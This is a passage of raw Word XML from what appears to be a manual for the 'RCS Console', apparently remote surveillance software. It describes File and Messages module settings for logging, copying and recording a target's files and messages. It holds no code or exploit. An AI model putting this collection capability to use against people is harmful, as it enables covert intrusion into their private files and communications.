                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F43991">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt; </w:t>
            </w:r>
            <w:r w:rsidR="00F43991" w:rsidRPr="0059452D">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00F43991">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Factory</w:t>
            </w:r>
            <w:r w:rsidR="00F43991" w:rsidRPr="0059452D">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> #</w:t>
            </w:r>
            <w:r w:rsidR="00F43991">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> &gt; Module (File)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F43991" w:rsidRDefault="00F43991" w:rsidP="00C93347"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grigliatabella"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="-10" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9628"/>
      </w:tblGrid>
      <w:tr w:rsidR="00424EB1" w:rsidTr="00C93347">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9628" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00424EB1" w:rsidRPr="00F43991" w:rsidRDefault="00424EB1" w:rsidP="00C74709">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="00C74709" w:rsidRPr="00F43991">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Include filter</w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00C74709" w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>allows to specify the file extensions to be recorded. Optionally specify the process to log the file when it is run or opened by that process.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C74709" w:rsidRPr="00F43991" w:rsidRDefault="00C74709" w:rsidP="00C74709">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C74709" w:rsidRPr="00F43991" w:rsidRDefault="00C74709" w:rsidP="00C74709">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Exclude filter</w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] allows to specify the file extensions that will not be recorded. Optionally specify the process to log the file when it is run or opened by that process.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F43991" w:rsidRPr="00F43991" w:rsidRDefault="00F43991" w:rsidP="00F43991">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00424EB1" w:rsidRPr="00F43991" w:rsidRDefault="00424EB1" w:rsidP="00F43991">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="00C74709" w:rsidRPr="00F43991">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Mask</w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00C74709" w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is the string used to specify the filter.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F43991" w:rsidRPr="00F43991" w:rsidRDefault="00F43991" w:rsidP="00F43991">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C74709" w:rsidRPr="00F43991" w:rsidRDefault="00C74709" w:rsidP="00F43991">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Log path and access mode</w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="0027669A" w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>records the file path and access type (e.g. read, write)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F43991" w:rsidRPr="00F43991" w:rsidRDefault="00F43991" w:rsidP="00F43991">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C74709" w:rsidRPr="00F43991" w:rsidRDefault="00C74709" w:rsidP="00F43991">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="0027669A" w:rsidRPr="00F43991">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Capture file content</w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="0027669A" w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>if enable, an exact copy of the file will be downloaded at the first access.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F43991" w:rsidRPr="00F43991" w:rsidRDefault="00F43991" w:rsidP="00F43991">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C74709" w:rsidRPr="00F43991" w:rsidRDefault="00C74709" w:rsidP="00F43991">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidR="00C00D75" w:rsidRPr="00F43991">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Min size</w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="007F3FBE" w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>minimum size admitted for the file to be downloaded.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F43991" w:rsidRPr="00F43991" w:rsidRDefault="00F43991" w:rsidP="00F43991">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="007F3FBE" w:rsidRPr="00F43991" w:rsidRDefault="007F3FBE" w:rsidP="00F43991">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Max size</w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] maximum size admitted for the file to be downloaded.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F43991" w:rsidRPr="00F43991" w:rsidRDefault="00F43991" w:rsidP="00F43991">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C93347" w:rsidRPr="00F43991" w:rsidRDefault="007F3FBE" w:rsidP="00C74709">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Newer than</w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] minimum file creation date for</w:t>
            </w:r>
            <w:r w:rsidR="00C93347">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> the file to be downloaded.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C93347" w:rsidRDefault="00C93347" w:rsidP="00424EB1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C93347" w:rsidRDefault="00C93347">
      <w:pPr>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4A383B" w:rsidTr="00C93347">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F43991" w:rsidRDefault="00F43991" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F43991" w:rsidRDefault="0010013A" w:rsidP="00F43991">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.28</w:t>
            </w:r>
            <w:r w:rsidR="00F43991">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F43991" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00F43991">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00F43991" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00F43991">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00F43991" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00F43991">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00F43991" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004A383B" w:rsidRPr="00A52C9B" w:rsidRDefault="00F43991" w:rsidP="00F4399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(Messages)</w:t>
            </w:r>
            <w:r w:rsidR="003A4380">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1141" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:187.55pt;height:221.85pt;z-index:251763712;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId182" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1141" DrawAspect="Content" ObjectID="_1446455367" r:id="rId183"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="289" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004A383B" w:rsidRDefault="004A383B" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5370" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="004A383B" w:rsidRPr="00F43991" w:rsidRDefault="004A383B" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="004A383B" w:rsidRPr="00F43991" w:rsidRDefault="004A383B" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="004A383B" w:rsidRPr="00F43991" w:rsidRDefault="004A383B" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Enabled</w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="009976CB" w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>enables messages recording.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="004A383B" w:rsidRPr="00F43991" w:rsidRDefault="004A383B" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="004A383B" w:rsidRPr="00F43991" w:rsidRDefault="004A383B" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>From</w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00D9362E" w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>records messages starting from the specified date.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F43991" w:rsidRPr="00F43991" w:rsidRDefault="00F43991" w:rsidP="00F43991">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="004A383B" w:rsidRPr="00F43991" w:rsidRDefault="004A383B" w:rsidP="00F43991">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>To</w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00D9362E" w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>records messages up to the specified date.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F43991" w:rsidRPr="00F43991" w:rsidRDefault="00F43991" w:rsidP="00F43991">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="004A383B" w:rsidRPr="00F43991" w:rsidRDefault="004A383B" w:rsidP="004A383B">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">[ </w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Max size</w:t>
            </w:r>
            <w:r w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> ] </w:t>
            </w:r>
            <w:r w:rsidR="00D9362E" w:rsidRPr="00F43991">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>is the maximum size of the message to be recorded.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="004A383B" w:rsidRDefault="004A383B" w:rsidP="004A383B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B65160" w:rsidRDefault="00B65160" w:rsidP="0079037A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grigliatabella"/>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583B07" w:rsidTr="00C93347">
        <w:trPr>
          <w:trHeight w:val="1635"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00F43991" w:rsidRDefault="00F43991" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00F43991" w:rsidRDefault="0010013A" w:rsidP="00F43991">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4.29</w:t>
            </w:r>
            <w:r w:rsidR="00F43991">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F43991" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00F43991">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00F43991" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00F43991">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00F43991" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00F43991">
              <w:rPr>
                <w:i/>
